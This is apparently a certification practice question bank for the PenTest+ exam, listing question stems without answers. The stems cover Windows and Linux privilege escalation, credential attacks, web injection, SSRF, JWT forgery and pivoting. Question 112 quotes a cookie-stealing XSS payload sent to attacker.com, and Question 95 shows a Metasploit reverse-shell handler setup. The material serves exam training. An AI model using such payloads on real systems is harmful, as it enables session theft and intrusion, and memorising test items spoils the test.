
PT0-002 Attacks and Exploits • Complete Question Bank

PT0-002 Attacks and Exploits — All Questions With Answers

Complete PT0-002 Attacks and Exploits question bank — all 0 questions with answers and detailed explanations.

181 Questions • Free • No signup
Question 1 • medium • multiple choice

A penetration tester is conducting an internal network assessment and wants to capture NTLMv2 hashes from Windows hosts without sending any authentication traffic. Which tool and attack technique should the tester use?

Question 2 • easy • multiple choice

During a web application test, the tester discovers a parameter that reflects user input in the response without sanitization. Which type of vulnerability is most likely present?

Question 3 • hard • multiple choice

A tester wants to exploit a Windows service running with SYSTEM privileges that has an unquoted service path containing spaces. Which technique should be used to escalate privileges?

Question 4 • medium • multiple choice

A penetration tester is performing a password attack on a Windows domain and has captured NTLM hashes. Which tool can be used to perform a pass-the-hash attack to gain remote code execution on a target system?

Question 5 • medium • multiple choice

During a web application test, the tester uses sqlmap and identifies a time-based blind SQL injection. Which technique is sqlmap using to extract data?

Question 6 • easy • multiple choice

A penetration tester needs to escalate privileges on a Linux system and finds that the current user can run a specific command with sudo without a password. Which tool should the tester consult to find known exploitation techniques for that command?

Question 7 • hard • multiple choice

A penetration tester is attempting to exploit a server-side request forgery (SSRF) vulnerability in a cloud-hosted web application to access the cloud metadata service. Which IP address should the tester target?

Question 8 • medium • multiple choice

A tester has gained a low-privilege shell on a Windows machine and found that the user has the SeImpersonatePrivilege enabled. Which attack can be used to escalate privileges to SYSTEM?

Question 9 • easy • multiple choice

A penetration tester wants to crack NTLM hashes obtained from a Windows domain. Which hashcat mode should the tester use?

Question 10 • medium • multiple choice

During a penetration test, the tester discovers a JWT token that uses the 'alg:none' header. Which attack does this vulnerability enable?

Question 11 • hard • multiple choice

A penetration tester has compromised a Linux host and wants to use it as a pivot point to access an internal network that is not directly reachable from the attacker's machine. Which tool can create a SOCKS proxy for routing traffic through the compromised host?

Question 12 • medium • multiple choice

A tester is exploiting a vulnerable web application and wants to perform a UNION-based SQL injection to extract data. Which condition is necessary for a successful UNION attack?

Question 13 • medium • multi select

A penetration tester is performing a Kerberoasting attack. Which TWO steps are required for a successful Kerberoasting attack?

Question 14 • medium • multi select

A penetration tester is testing a web application and wants to exploit an XXE vulnerability to read sensitive files. Which TWO payloads could be used?

Question 15 • hard • multi select

A penetration tester is performing lateral movement in a Windows domain after compromising a workstation. Which THREE techniques can be used to move to another machine?

Question 16 • easy • multiple choice

During an internal penetration test, a tester wants to capture NTLMv2 hashes by poisoning LLMNR and NBT-NS traffic. Which tool should the tester use?

Question 17 • medium • multiple choice

A penetration tester has successfully compromised a Windows machine and wants to perform lateral movement to another machine using captured NTLM hashes. Which tool would allow the tester to pass the hash and execute commands remotely?

Question 18 • hard • multiple choice

During a penetration test, a tester identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). The tester attempts to access the AWS metadata endpoint to retrieve temporary credentials. Which IP address is commonly used for the cloud metadata endpoint?

Question 19 • medium • multiple choice

A penetration tester is exploiting a SQL injection vulnerability in a login page. The tester wants to extract data from another table without returning data in the original query. Which SQL injection technique should the tester use?

Question 20 • easy • multiple choice

A tester wants to crack NTLM hashes captured from a Windows domain. Which hashcat mode should be used for NTLM hashes?

Question 21 • medium • multiple choice

During a Linux privilege escalation attempt, a tester finds a binary with the SUID bit set that is not on the GTFOBins list. The binary executes /bin/bash with the effective UID of root. What is the most likely way to exploit this?

Question 22 • hard • multiple choice

A penetration tester is assessing a web application that uses JSON Web Tokens (JWT) for authentication. The tester discovers that the server does not validate the signature algorithm properly. Which attack should the tester attempt to forge a valid token?

Question 23 • easy • multiple choice

Which Metasploit command is used to interact with an established session on a compromised host?

Question 24 • medium • multiple choice

A tester is performing a Cross-Site Request Forgery (CSRF) attack on a web application that uses SameSite cookies. Which SameSite attribute value is most likely to prevent the attack?

Question 25 • medium • multiple choice

During a Windows privilege escalation attempt, the tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool is commonly used to exploit this privilege to gain SYSTEM?

Question 26 • hard • multiple choice

A penetration tester has gained access to a Linux server and wants to move laterally to a Windows server. The tester captured a hash of a domain user. Which tool can be used to authenticate to the Windows server using the hash?

Question 27 • medium • multiple choice

A tester is performing a Kerberoasting attack. After requesting TGS tickets, which hashcat mode should be used to crack them?

Question 28 • medium • multi select

A penetration tester is conducting an internal network assessment. The tester wants to perform a man-in-the-middle attack to capture credentials. Which TWO tools can be used for ARP spoofing?

Question 29 • hard • multi select

During a post-exploitation phase, a tester needs to establish persistence on a Windows target. Which THREE methods are commonly used for persistence on Windows?

Question 30 • medium • multi select

A penetration tester is exploiting a web application and discovers an XML External Entity (XXE) vulnerability. Which TWO attacks can be performed using XXE?

Question 31 • easy • multiple choice

A penetration tester is conducting a network attack and wants to intercept traffic between two hosts on the same local network by spoofing ARP responses. Which tool is specifically designed for this purpose?

Question 32 • medium • multiple choice

During a penetration test, you capture NTLM hashes by poisoning LLMNR requests. Which tool would you use to exploit this and obtain the hashes?

Question 33 • hard • multiple choice

After compromising a Linux host, you want to escalate privileges by exploiting a cron job that runs a script with root privileges. The script references an executable using a relative path. Which attack technique is most appropriate?

Question 34 • easy • multiple choice

In a web application test, you find a parameter that directly references internal object IDs (e.g., user_id=123) and changing the ID allows access to another user's data. This vulnerability is known as:

Question 35 • medium • multiple choice

During an internal penetration test, you need to perform lateral movement to a Windows target. You have a plaintext password for a domain user account. Which tool would be most appropriate to authenticate to the target using WMI?

Question 36 • hard • multiple choice

You have obtained an NTLM hash of a domain admin account and want to authenticate to a remote server without cracking the password. Which technique enables you to authenticate using the hash?

Question 37 • medium • multiple choice

A penetration tester is exploiting a SQL injection vulnerability in a web application. They want to extract data from the database without displaying it on the page. Which SQL injection technique should they use?

Question 38 • medium • multiple choice

During a web application test, you discover a parameter that reflects user input in the response without proper encoding. You craft a payload that executes JavaScript in the victim's browser. This vulnerability is best classified as:

Question 39 • hard • multiple choice

You are attacking a web application and notice that it makes requests to internal services. You attempt to access the cloud metadata endpoint at http://169.254.169.254/. Which vulnerability are you most likely exploiting?

Question 40 • medium • multiple choice

After gaining initial access to a Windows host, you want to escalate privileges by exploiting a service that runs as SYSTEM but has an unquoted service path. What is the attack vector?

Question 41 • easy • multiple choice

Which Metasploit command is used to display information about the current meterpreter session, including the target OS and user?

Question 42 • medium • multiple choice

A penetration tester needs to crack a large number of NTLM hashes. They have a wordlist and want to apply common password mutations. Which hashcat option enables the use of a rule file to mutate words?

Question 43 • medium • multi select

During a penetration test of a web application, you want to test for Cross-Site Request Forgery (CSRF) vulnerabilities. Which TWO conditions are necessary for a CSRF attack to succeed?

Question 44 • hard • multi select

You have gained a foothold on a Linux server and identified a SUID binary that can be exploited to read arbitrary files. Which THREE techniques could be used to escalate privileges or gather sensitive information?

Question 45 • medium • multi select

A penetration tester wants to pivot from a compromised Linux host to attack internal network resources that are not directly accessible. Which THREE tools or techniques can be used for pivoting?

Question 46 • medium • multiple choice

During a penetration test, a tester captures NTLM hashes by spoofing LLMNR responses on the internal network. Which tool is most commonly used for this purpose?

Question 47 • easy • multiple choice

A penetration tester wants to perform a pass-the-hash attack on a Windows target. Which tools can be used for this purpose? (Choose the best answer.)

Question 48 • hard • multiple choice

During a web application test, the tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester modifies the JWT header to set the algorithm to 'none' and removes the signature. The server accepts the token. What type of attack is this?

Question 49 • medium • multiple choice

A penetration tester needs to escalate privileges on a Linux system and finds that the user can run a script with sudo that has a vulnerable argument. Which resource should the tester consult to find exploitation techniques for common sudo misconfigurations?

Question 50 • medium • multiple choice

A penetration tester obtains a meterpreter session on a Windows target. Which command would the tester use to check the current user's privileges and potentially escalate privileges if SeImpersonatePrivilege is enabled?

Question 51 • easy • multiple choice

During a penetration test, a tester wants to crack NTLM hashes captured from a Windows domain. Which hashcat mode should the tester use for NTLM hashes?

Question 52 • medium • multiple choice

A penetration tester is performing a web application test and wants to exploit a SQL injection vulnerability to extract data from a database. The tester knows that the application returns results in the HTTP response. Which type of SQL injection is being used?

Question 53 • hard • multiple choice

A penetration tester discovers a web application that fetches URLs from user input without proper validation. The tester targets the internal cloud metadata endpoint at 169.254.169.254 to retrieve instance credentials. Which type of attack is this?

Question 54 • easy • multiple choice

A penetration tester wants to use Metasploit to exploit a remote service. After selecting an exploit module, which command is used to set the remote host IP address?

Question 55 • medium • multiple choice

During a Windows privilege escalation attempt, a tester finds that the SeImpersonatePrivilege is enabled for the current user. Which tool can be used to escalate privileges to SYSTEM using this privilege?

Question 56 • medium • multiple choice

A penetration tester is performing an ARP spoofing attack using Bettercap to intercept traffic between a client and the gateway. What is the primary goal of this attack?

Question 57 • hard • multiple choice

A tester finds a Linux binary with the SUID bit set that is owned by root and can be executed by any user. The binary is known to have a vulnerability that allows arbitrary code execution. Which command does the tester use to find all SUID binaries on the system?

Question 58 • medium • multi select

A penetration tester has compromised a Linux server and wants to establish persistence. Which TWO of the following methods are commonly used for persistence on Linux?

Question 59 • hard • multi select

During a penetration test, a tester successfully exploits a web application and gains a foothold. The tester needs to pivot to an internal network segment that is not directly accessible. Which THREE tools can the tester use to create a SOCKS proxy or tunnel for pivoting?

Question 60 • medium • multi select

A penetration tester is assessing an Active Directory environment and wants to perform Kerberoasting to obtain service account passwords. Which TWO conditions are required for a successful Kerberoasting attack?

Question 61 • easy • multiple choice

A penetration tester is performing a network attack and wants to intercept traffic between two hosts on the same local network. Which technique should the tester use to redirect traffic through their machine?

Question 62 • medium • multiple choice

During a penetration test, the tester captured an NTLM hash using Responder and wants to pass the hash to gain access to a remote Windows system. Which tool would be most appropriate to perform a pass-the-hash attack?

Question 63 • medium • multiple choice

A penetration tester is performing a SQL injection test on a web application. The tester sends the payload ' OR '1'='1 and receives the same response as with a normal request. However, when sending ' OR '1'='2, the response differs. Which type of SQL injection is most likely present?

Question 64 • hard • multiple choice

During a web application penetration test, the tester discovers a JWT token in the Authorization header. The token uses the 'none' algorithm. What attack should the tester attempt?

Question 65 • easy • multiple choice

A tester has exploited a Linux system and gained a low-privilege shell. The tester runs 'sudo -l' and sees that the current user can run /usr/bin/find as root without a password. Which privilege escalation technique should the tester use?

Question 66 • medium • multiple choice

A penetration tester is performing an NTLM relay attack against a Windows network. The tester uses ntlmrelayx to relay captured NTLM authentication attempts to a target server. What must be true for this attack to succeed?

Question 67 • medium • multiple choice

After gaining a foothold on a Windows server, a tester wants to laterally move to another machine. The tester has obtained NTLM hashes and wants to execute commands remotely. Which tool is specifically designed for remote command execution using hashes via WMI?

Question 68 • hard • multiple choice

During a penetration test, the tester discovers a Linux binary with the SUID bit set owned by root. The binary is a custom script that executes 'cp' to copy files. The tester can control the source file path via an environment variable. Which privilege escalation technique should the tester attempt?

Question 69 • easy • multiple choice

A penetration tester wants to crack NTLM hashes captured during an internal test. Which hashcat mode should the tester use for NTLM hashes?

Question 70 • medium • multiple choice

A tester is performing a web application test and discovers a parameter that seems to reflect input in the response. The tester attempts a reflected XSS payload but the application filters script tags. Which XSS variant should the tester try next?

Question 71 • hard • multiple choice

During a penetration test, the tester gains a Meterpreter session on a Windows target and wants to escalate privileges to SYSTEM. The current user has the SeImpersonatePrivilege token. Which tool should the tester use to exploit this privilege?

Question 72 • medium • multiple choice

A tester is performing a Kerberoasting attack. After requesting TGS tickets for accounts with SPNs, what is the next step to obtain plaintext credentials?

Question 73 • medium • multi select

A penetration tester is performing a web application test and identifies an endpoint that is vulnerable to Server-Side Request Forgery (SSRF). Which of the following actions can the tester perform using this vulnerability? (Choose TWO.)

Question 74 • hard • multi select

During a Windows privilege escalation attempt, a penetration tester discovers that the always elevated installation policy is enabled. Which of the following actions can the tester take to exploit this misconfiguration? (Choose TWO.)

Question 75 • medium • multi select

A penetration tester is conducting a web application test and discovers an XML External Entity (XXE) vulnerability. Which of the following attacks can the tester perform using XXE? (Choose THREE.)

Question 76 • easy • multiple choice

During a penetration test, a tester captures NTLMv2 hashes by spoofing LLMNR and NBT-NS responses on the internal network. Which tool is most commonly used for this type of attack?

Question 77 • medium • multiple choice

A penetration tester has gained a low-privilege shell on a Windows server and discovers the user has the SeImpersonatePrivilege. Which tool could the tester use to escalate privileges to SYSTEM?

Question 78 • hard • multiple choice

During a web application test, the tester discovers a parameter that reflects user input in the response without proper encoding. The tester crafts a payload that executes JavaScript when another user views the page. Which type of XSS is this, and what is a primary risk?

Question 79 • medium • multiple choice

A penetration tester needs to crack NTLM hashes obtained from a Windows domain. The hashes are in the format used by Windows. Which hashcat mode should the tester use?

Question 80 • medium • multiple choice

While testing a Linux system, the tester finds a binary with the SUID bit set owned by root. The binary executes a command based on user input without verifying the path. Which privilege escalation technique does this exemplify?

Question 81 • easy • multiple choice

A penetration tester wants to perform a pass-the-hash attack against a Windows system using a captured NTLM hash. Which tool can be used to authenticate and execute commands remotely?

Question 82 • medium • multiple choice

A tester identifies a SQL injection vulnerability in a login form. The application responds with different error messages for valid and invalid queries. Which type of SQL injection is most likely present, and what tool could automate exploitation?

Question 83 • hard • multiple choice

During an internal penetration test, the tester wants to relay captured NTLM authentication to a server to gain access. Which tool from the Impacket suite is specifically designed for NTLM relay attacks?

Question 84 • medium • multiple choice

A penetration tester gains a shell on a Linux server and needs to pivot to an internal network. The tester's attack machine can reach the compromised server but not the internal network. Which tool can create a SOCKS proxy on the compromised server?

Question 85 • easy • multiple choice

A tester wants to crack a password hash using a wordlist combined with rules to generate variations. Which hashcat attack mode should be used?

Question 86 • hard • multiple choice

A web application uses JSON Web Tokens (JWT) for authentication. The tester intercepts a token and decodes it to find the header contains "alg":"none". What vulnerability does this indicate, and how can it be exploited?

Question 87 • medium • multiple choice

After compromising a Windows workstation, the tester wants to extract password hashes from the local SAM database. Which Metasploit meterpreter command should be used?

Question 88 • medium • multi select

A penetration tester is conducting a web application test and discovers a server-side request forgery (SSRF) vulnerability. The application accepts a URL parameter and fetches the resource. Which TWO of the following are common SSRF exploitation techniques?

Question 89 • medium • multi select

During a Windows privilege escalation attempt, the tester finds that the AlwaysInstallElevated registry key is set to 1. Which TWO actions can the tester perform to escalate privileges?

Question 90 • hard • multi select

A penetration tester has gained initial access to a Linux server and wants to establish persistence. Which THREE of the following methods are commonly used for persistence on Linux systems?

Question 91 • easy • multiple choice

A penetration tester runs the following command: `hashcat -m 1000 -a 0 hashes.txt rockyou.txt`. What type of attack is being performed?

Question 92 • medium • multiple choice

During a penetration test, a tester captures NTLM hashes using Responder. Which of the following techniques would allow the tester to authenticate to a remote server without cracking the password?

Question 93 • medium • multiple choice

A penetration tester is performing a web application test and discovers that the application reflects user input in the response without proper sanitization. However, the tester notices that the input is handled client-side via JavaScript. Which type of XSS is this?

Question 94 • hard • multiple choice

A tester is exploiting a Linux system and finds a binary with the SUID bit set owned by root. The binary executes other commands. Which technique would allow privilege escalation to root?

Question 95 • medium • multiple choice

A tester runs the following Metasploit commands:

```
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.0.5
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run
```

What is the purpose of this configuration?

Question 96 • easy • multiple choice

A tester wants to enumerate SMB shares and execute commands remotely on a Windows target using captured credentials. Which tool is most appropriate?

Question 97 • hard • multiple choice

During a web application test, a tester discovers that the application uses JWTs for session management. The tester captures a JWT and notices the 'alg' header is set to 'none'. Which attack is the tester likely to perform?

Question 98 • medium • multiple choice

A tester is performing a privilege escalation on a Windows system and finds that the user has SeImpersonatePrivilege enabled. Which tool could be used to escalate to SYSTEM?

Question 99 • easy • multiple choice

A tester is attempting to crack WPA2 handshakes captured from a wireless network. Which hashcat mode should be used?

Question 100 • medium • multiple choice

A tester is exploiting a SQL injection vulnerability in a login form. The application returns different responses for valid and invalid queries. However, the tester cannot see the database output. Which type of SQL injection is most likely?

Question 101 • hard • multiple choice

During a penetration test, a tester gains initial access to a Linux server and wants to pivot to an internal network that is not directly accessible. Which of the following tools is specifically designed for creating SOCKS proxies for pivoting?

Question 102 • medium • multiple choice

A tester is performing a web application test and finds an endpoint that accepts XML input. The tester sends a payload that includes an external entity referencing a local file. Which vulnerability is being tested?

Question 103 • medium • multi select

A penetration tester is performing a full-scope engagement and needs to identify potential privilege escalation vectors on a Windows system. Which TWO of the following are valid Windows privilege escalation techniques?

Question 104 • medium • multi select

During a web application penetration test, a tester wants to identify vulnerabilities that allow unauthorized access to internal resources. Which TWO of the following are commonly exploited to access internal services?

Question 105 • hard • multi select

A penetration tester successfully compromises a web server and wants to establish persistence on the system. Which THREE of the following are effective persistence mechanisms on a Linux system?

Question 106 (easy, multiple choice)

During a penetration test, a tester runs the Responder tool on the internal network and captures an NTLMv2 hash. Which type of network attack is being performed?

Question 107 (easy, multiple choice)

A penetration tester wants to crack NTLM hashes obtained from a Windows system. Which Hashcat mode should be used?

Question 108 (medium, multiple choice)

During a web application test, a tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester intercepts a JWT and changes the algorithm header to 'none' with an empty signature. Which attack is being attempted?

Question 109 (medium, multiple choice)

A penetration tester gains a low-privilege shell on a Linux server. The command 'sudo -l' reveals that the user can run /usr/bin/less as root without a password. Which tool would the tester likely use to escalate privileges?

Question 110 (hard, multiple choice)

During a penetration test, a tester uses Metasploit to exploit a Windows service and gets a meterpreter session. The tester wants to dump hashes from the compromised system. Which meterpreter command should be used?

Question 111 (medium, multiple choice)

A penetration tester is testing a web application and discovers an endpoint that returns XML data. The tester attempts to read /etc/passwd by injecting an external entity. Which type of attack is this?

Question 112 (medium, multiple choice)

While performing a web application penetration test, a tester observes that the application reflects user input in the page without proper sanitization. To steal session cookies, the tester crafts a payload like <script>document.location='http://attacker.com/?cookie='+document.cookie</script>. Which XSS type is this?

Question 113 (easy, multiple choice)

A penetration tester wants to perform a pass-the-hash attack against a Windows system. Which tool can be used to authenticate using the NTLM hash instead of a password?

Question 114 (hard, multiple choice)

During a post-exploitation phase, a tester has a foothold on a Linux server and wants to pivot to an internal web server that is not directly accessible. The tester has SSH access to the compromised server. Which command would create a local port forward to access the internal web server on port 80?

Question 115 (medium, multiple choice)

A penetration tester is performing a Kerberoasting attack. After requesting TGS tickets from a domain controller, which tool would be used to crack the tickets offline?

Question 116 (hard, multiple choice)

During a Windows privilege escalation attempt, a tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool can be used to exploit this privilege to gain SYSTEM access?

Question 117 (medium, multiple choice)

A tester finds that a web application is vulnerable to Server-Side Request Forgery (SSRF). The tester wants to access the cloud metadata endpoint to obtain instance credentials. Which IP address is commonly used for the cloud metadata service?

Question 118 (medium, multi-select)

A penetration tester has obtained a set of NTLM hashes from a Windows domain. The tester wants to perform lateral movement to other systems. Which TWO tools can be used for this purpose? (Select TWO.)

Question 119 (medium, multi-select)

During a web application penetration test, a tester identifies a SQL injection vulnerability. Which TWO techniques could be used to extract data from the database? (Select TWO.)

Question 120 (hard, multi-select)

A penetration tester has gained a foothold on a Linux server and wants to escalate privileges to root. Which THREE of the following are potential privilege escalation vectors? (Select THREE.)

Question 121 (medium, multiple choice)

During a penetration test, a tester captures NTLMv2 hashes using Responder. The tester then uses ntlmrelayx to relay the captured hashes to a target server. Which of the following best describes this attack technique?

Question 122 (easy, multiple choice)

A penetration tester is performing an internal assessment and wants to intercept network traffic to capture credentials. Which tool is specifically designed for ARP spoofing and can also perform SSL stripping?

Question 123 (hard, multiple choice)

A penetration tester has gained a low-privilege shell on a Windows server and discovered that the SeImpersonatePrivilege is enabled. Which of the following tools would be most appropriate to escalate privileges to SYSTEM-level access?

Question 124 (medium, multiple choice)

A tester is exploiting a web application and identifies a parameter that reflects user input in the response without sanitization. The tester wants to steal session cookies from other users. Which type of cross-site scripting (XSS) attack should the tester use?

Question 125 (easy, multiple choice)

A penetration tester is using Hashcat to crack NTLM hashes obtained from a Windows domain controller. Which hash mode should the tester specify for NTLM hashes?

Question 126 (medium, multiple choice)

During a web application test, a tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester attempts to modify the 'alg' header to 'none' and sends the token. The server accepts the forged token. Which vulnerability is being exploited?

Question 127 (hard, multiple choice)

A penetration tester is performing an internal test and wants to move laterally from a compromised workstation to a domain controller. The tester has obtained an NTLM hash for a domain admin. Which of the following tools would allow the tester to authenticate using the hash without cracking it?

Question 128 (medium, multiple choice)

A tester finds a Linux binary with the SUID bit set. The binary is owned by root and executes a shell command. The tester runs the binary and gets a root shell. Which command would the tester likely have used to discover this SUID binary?

Question 129 (easy, multiple choice)

A tester is performing an SQL injection attack on a login form. The tester inputs a single quote (') and receives a database error. The application returns different responses for true and false conditions. Which type of SQL injection is most likely occurring?

Question 130 (medium, multiple choice)

A tester is targeting a web application that makes server-side requests to internal resources based on user input. The tester attempts to access the AWS metadata endpoint at http://169.254.169.254/latest/meta-data/. The request returns sensitive cloud credentials. Which vulnerability is being exploited?

Question 131 (hard, multiple choice)

During a penetration test, a tester gains access to a Linux system and runs 'sudo -l', which reveals that the user can run /usr/bin/python with root privileges without a password. Which resource should the tester consult to find a method to escalate privileges using this configuration?

Question 132 (medium, multiple choice)

A tester wants to perform a Kerberoasting attack against an Active Directory domain. The tester has a domain account with no special privileges. Which of the following is required to successfully request TGS tickets for offline cracking?

Question 133 (medium, multi-select)

A penetration tester has obtained a meterpreter session on a Windows target. The tester wants to escalate privileges to SYSTEM and then dump password hashes. Which two meterpreter commands should the tester use in sequence? (Choose TWO.)

Question 134 (hard, multi-select)

A tester is performing a post-exploitation phase on a compromised Linux server and wants to establish persistence. Which THREE of the following methods are commonly used for Linux persistence? (Choose THREE.)

Question 135 (medium, multi-select)

A penetration tester is exploiting a web application and discovers an endpoint that allows an attacker to read arbitrary files on the server by manipulating XML input. The application uses an XML parser that does not disable external entities. Which TWO attacks can the tester perform using this vulnerability? (Choose TWO.)

Question 136 (easy, multiple choice)

During a penetration test, you run the following command on a Linux target: `find / -type f -perm /4000 2>/dev/null`. What are you attempting to identify?

Question 137 (medium, multiple choice)

You have captured an NTLMv2 hash from an LLMNR poisoning attack using Responder. Which tool and mode would you use to attempt to crack the hash using a dictionary attack?

Question 138 (medium, multiple choice)

During a web application test, you discover an endpoint that accepts a URL parameter and fetches the content. You try `http://169.254.169.254/latest/meta-data/` and receive a response. Which vulnerability is this?

Question 139 (hard, multiple choice)

In a Windows domain, you have compromised a user account with SeImpersonatePrivilege enabled. Which tool or technique would best leverage this privilege to escalate to SYSTEM?

Question 140 (easy, multiple choice)

Which SQL injection technique involves injecting a query that causes a delay in response, allowing the attacker to infer information based on response time?

Question 141 (medium, multiple choice)

After exploiting a Linux server, you need to pivot to a restricted network subnet. You have SSH access to the compromised server. Which command would create a SOCKS proxy on the server to route traffic through it?

Question 142 (medium, multiple choice)

You are testing a web application and notice that it uses JSON Web Tokens (JWT) for authentication. You change the algorithm to 'none' and remove the signature, and the token is accepted. Which JWT vulnerability did you exploit?

Question 143 (hard, multiple choice)

During a penetration test, you successfully execute a Meterpreter session on a Windows target. You want to dump password hashes from the SAM database. Which Meterpreter command should you use?

Question 144 (easy, multiple choice)

In Metasploit, after searching for an exploit, you select it with 'use exploit/...' and set required options. What is the final command to execute the exploit against the target?

Question 145 (medium, multiple choice)

You are performing a password attack on a Linux system. You have obtained the /etc/shadow file. Which password cracking tool would be most efficient for a rule-based attack using a wordlist?

Question 146 (hard, multiple choice)

During a web application test, you find a feature that allows users to export data as PDF. The PDF generation uses user input without sanitization. You inject an XML external entity that reads /etc/passwd and the content appears in the PDF. Which vulnerability is present?

Question 147 (medium, multiple choice)

You are performing a penetration test and capture a Kerberos TGS ticket for a service account. What kind of attack can you perform offline to crack the service account password?

Question 148 (medium, multi-select)

You are enumerating a Linux system for privilege escalation vectors. Which TWO conditions below could be exploited to escalate privileges? (Select TWO.)

Question 149 (medium, multi-select)

During a web application penetration test, you find that the application is vulnerable to CSRF. Which TWO factors could prevent exploitation even if a CSRF vulnerability exists? (Select TWO.)

Question 150 (hard, multi-select)

You have compromised a low-privileged Windows user and want to move laterally to a domain controller. Which THREE techniques could be used for lateral movement if you have valid credentials? (Select THREE.)

Question 151 (easy, multiple choice)

During a penetration test, a tester captures NTLMv2 hashes by spoofing LLMNR responses. Which tool is most commonly used for this purpose?

Question 152 (medium, multiple choice)

A penetration tester wants to perform a pass-the-hash attack against a Windows target. Which tools can be used to authenticate using an NTLM hash without knowing the plaintext password? (Choose the best option.)

Question 153 (hard, multiple choice)

During a web application test, a tester discovers a parameter that appears to be vulnerable to SQL injection. They want to extract data from a database using a technique that does not rely on visible output. Which type of SQL injection is most appropriate?

Question 154 (easy, multiple choice)

A penetration tester identifies a Linux binary with the SUID bit set. Which command can find all SUID binaries on a Linux system?

Question 155 (medium, multiple choice)

While exploiting a Windows machine, a tester gains a shell with limited privileges. They attempt to escalate privileges using a tool that exploits the SeImpersonatePrivilege. Which tool is specifically designed for this purpose on modern Windows versions?

Question 156 (medium, multiple choice)

A tester is performing a JWT attack and modifies the header to set the algorithm to 'none'. Which vulnerability are they exploiting?

Question 157 (easy, multiple choice)

After gaining initial access to a target, a tester wants to pivot to an internal network that is not directly accessible. Which technique can be used to forward traffic from the tester's machine through the compromised host to reach internal services?

Question 158 (medium, multiple choice)

A penetration tester needs to perform Kerberoasting against an Active Directory domain. Which step is required after requesting TGS tickets?

Question 159 (hard, multiple choice)

During a web application test, a tester discovers an endpoint that fetches a URL from user input without validation. They attempt to access the AWS metadata endpoint. Which IP address is commonly used for the cloud metadata service?

Question 160 (medium, multiple choice)

A tester exploits an XXE vulnerability to read local files. Which of the following is a typical XXE payload to read /etc/passwd?

Question 161 (medium, multiple choice)

After compromising a host, a tester wants to maintain persistence on a Windows system by executing a payload each time a user logs in. Which registry key is commonly used for this?

Question 162 (hard, multiple choice)

A tester is using Hashcat to crack NTLM hashes. They want to try all possible passwords consisting of exactly 8 lowercase letters. Which attack mode and mask should they use?

Question 163 (medium, multi-select)

A penetration tester is performing a web application assessment. Which of the following are common techniques to identify and exploit IDOR vulnerabilities? (Select TWO.)

Question 164 (medium, multi-select)

During a Linux privilege escalation attempt, a tester checks for misconfigurations that could allow running commands as root. Which of the following are potential vectors? (Select THREE.)

Question 165 (hard, multi-select)

A penetration tester has gained a foothold in a Windows domain and wants to perform lateral movement. Which of the following tools or techniques can be used? (Select THREE.)

Question 166 (easy, multiple choice)

During a penetration test, a tester uses Responder to capture NTLM hashes from a Windows network. Which of the following protocols is MOST commonly targeted by Responder for poisoning?

Question 167 (medium, multiple choice)

A penetration tester gains a low-privilege shell on a Linux server. Using 'sudo -l', the tester finds that they can run '/usr/bin/vi' as root without a password. Which technique would the tester MOST likely use to escalate privileges?

Question 168 (hard, multiple choice)

During a web application test, a tester discovers a JWT token with the following header: {'alg':'HS256','typ':'JWT'}. The token payload contains 'admin':false. The tester attempts to change the algorithm to 'none' and removes the signature. Which vulnerability is being exploited?

Question 169 (medium, multiple choice)

A penetration tester uses Hashcat to crack NTLM hashes captured during a pass-the-hash attack. Which Hashcat mode should the tester use for NTLM hashes?

Question 170 (medium, multi-select)

A penetration tester has compromised a Windows machine and wants to perform lateral movement to another machine on the same network. The tester has obtained NTLM hashes, but not plaintext passwords. Which TWO tools can be used for pass-the-hash attacks?

Question 171 (hard, multi-select)

During a Linux privilege escalation assessment, the tester finds that a binary with SUID root can execute arbitrary commands. Which TWO of the following methods are MOST likely to exploit this?

Question 172 (medium, multi-select)

A penetration tester is conducting a web application test and finds a parameter that is vulnerable to XXE. Which THREE of the following actions can the tester perform using XXE?

Question 173 (easy, multi-select)

A penetration tester is using Metasploit to exploit a remote Windows service. After a successful exploit, the tester gets a meterpreter session. Which TWO commands can the tester use to gather system information and credentials?

Question 174 (medium, multi-select)

A penetration tester is performing post-exploitation on a compromised Linux server and wants to maintain persistence. Which TWO of the following methods are commonly used for Linux persistence?

Question 175 (hard, multi-select)

During a penetration test, the tester discovers a web application vulnerable to CSRF. The application uses SameSite cookies set to 'Lax'. Which THREE methods might the tester use to exploit the CSRF vulnerability?

Question 176 (easy, multi-select)

A penetration tester is using Hashcat to crack password hashes. Which TWO attack modes are commonly used?

Question 177 (medium, multi-select)

During a Windows privilege escalation attempt, the tester finds that the current user has SeImpersonatePrivilege enabled. Which THREE tools or techniques can be used to exploit this privilege?

Question 178 (medium, multi-select)

A penetration tester is performing a web application test and identifies a potential SQL injection vulnerability. Which TWO methods can the tester use to confirm the vulnerability and extract data?

Question 179 (hard, multi-select)

During a penetration test, the tester gains access to a domain-joined Windows machine and wants to perform Kerberoasting. Which THREE conditions are necessary for a successful Kerberoasting attack?

Question 180 (medium, multi-select)

A penetration tester is using Metasploit to pivot from a compromised host to an internal network. Which THREE Metasploit features can facilitate pivoting?

Question 181 (medium, multi-select)

A penetration tester has gained initial access to an internal Windows server and wants to escalate privileges to SYSTEM. The tester identified that the current user has the SeImpersonatePrivilege enabled. Which TWO of the following tools or techniques would be most appropriate to exploit this privilege for privilege escalation?
